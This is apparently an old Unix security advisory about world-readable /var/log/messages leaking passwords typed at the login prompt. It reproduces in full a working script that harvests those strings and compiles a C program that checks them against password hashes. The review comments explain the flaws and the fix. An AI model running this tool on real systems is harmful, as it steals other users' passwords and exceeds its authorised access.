COMMAND

    kernel

SYSTEMS AFFECTED

    RedHat 3.0.3 & Slackware (maybe others)

PROBLEM

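This old problem refuses to die: on the systems above, /var/log/messages is world-readable, and a password typed at the login prompt may be logged there, where any local user can read it. The script below, posted by Dave G., demonstrates the exposure; making the log file readable only by root closes it.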

#!/bin/sh
#
# yankpw
#
# Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0)
# /var/log/messages is world readable. If a user types in his password at
# the login prompt, it may get logged to /var/log/messages.
#
# I could swear this topic has been beaten to death, but I still see this
# problem on every linux box I have access to.
#
# Dave G.
# 12/06/96
# <daveg@escape.com>
# http://www.escape.com/~daveg

# Step 1: build a candidate list from the failed-login records in the system log.
# The pipeline keeps only lines containing "LOGIN FAILURE", takes the second
# comma-separated field, drops that field's first character, then sorts and
# de-duplicates the result.
# NOTE(review): presumably that field is whatever was typed at the "login:"
# prompt, which is how a mistyped password ends up in the list; the log format
# itself is not shown here, so confirm against the local login program.
# NOTE(review): this step only succeeds because /var/log/messages is readable by
# an unprivileged user. Restricting the log to root (or an admin group) removes
# the exposure this script demonstrates.
# NOTE(review): the output name is predictable ($$ is the shell's PID), lives in
# /tmp, is opened in append mode (>>) and is created under the caller's umask,
# so the harvested strings may themselves be readable by other local users.
echo Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$

grep "LOGIN FAILURE" /var/log/messages | cut -d',' -f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$$

# Step 2: write and compile the checking helper, but only when ./scrack does not
# already exist in the current directory.
# NOTE(review): an existing ./scrack is trusted and executed as-is further down,
# so this should only ever be run from a directory the auditor controls.
if [ ! -e ./scrack ]
then
   echo "Creating scrack.c"
   # The here-document below (terminated by the line "!") becomes scrack.c. The
   # delimiter is unquoted, so the shell would expand $ and backquotes in the
   # body; the body contains neither.
   #
   # What the C program does: it reads the file named by argv[1] line by line
   # and, for each line, walks every getpwent() entry. Entries whose pw_passwd
   # is "*" or is not exactly 13 characters long are skipped. For the rest it
   # calls crypt() with the line as the key and the first two characters of the
   # stored hash as the salt, and prints "l: <name> p: <line>" when the result
   # equals the stored hash.
   #
   # NOTE(review): the check depends on 13-character hashes being returned by
   # getpwent() to an unprivileged caller. Where the password field handed to
   # such callers is a placeholder instead, the length test skips every account.
   # NOTE(review): code-quality caveats in the C text, which is pre-ANSI style:
   # argv[1] is used without checking argc; strncpy() copies two bytes into
   # salt[3] and nothing sets salt[2]; the last byte of every line is overwritten
   # whether or not it is a newline; strlen/strcmp/exit/crypt are used without
   # their declaring headers.
   cat << ! > scrack.c
#include <stdio.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>
#define get_salt( d, s ) strncpy( d, s, 2 )
void
main(argc,argv)
int argc;
char **argv;
{
   struct passwd *pwd;
   FILE *fp;
   char buff[80], salt[3], *encrypted_string;

   if ( ( fp = fopen( argv[1], "r" ) ) == NULL )
   {
      fprintf( stderr, "Couldnt find dict file\n" );
      exit(1);
   }
   while ( fgets( buff, 80, fp ) != NULL )
   {
      setpwent();
      buff[strlen(buff)-1]='\0';
      while ( ( pwd = getpwent() ) != NULL )
      {
        if ( strcmp( (*pwd).pw_passwd, "*" ) != 0 &&
           ( strlen( (*pwd).pw_passwd ) == 13 ) )
        {
           get_salt(salt, (*pwd).pw_passwd );

           encrypted_string = crypt( buff, salt );
           if ( strcmp( encrypted_string, (*pwd).pw_passwd ) == 0 )
           {
             fprintf( stdout, "l: %s p: %s\n", (*pwd).pw_name, buff);
             fflush(stdout);
           }
         }
      }
   }
}
!
   echo "Creating scrack"
   # Compile the helper into ./scrack; -s strips the symbol table from the binary.
   # NOTE(review): the compiler's exit status is not checked, so a failed build
   # goes unnoticed until ./scrack is invoked after this block.
   cc -O6 -fomit-frame-pointer -s -o scrack scrack.c
fi

# Step 3: run the helper over the candidate list built from the log. Each hit is
# printed on stdout by the helper as "l: <account> p: <candidate>".
./scrack /tmp/messages.dict.$$

# Nothing is cleaned up: the candidate list, the binary and the C source are all
# left on disk, and the message below only reminds the operator of that.
# NOTE(review): the leftover /tmp/messages.dict.<pid> file holds strings lifted
# from the log, possibly real passwords, so after an audit it should be removed
# rather than left in a shared directory.
echo /tmp/messages.dict.$$, ./scrack, and ./scrack.c still exist, delete them yourself.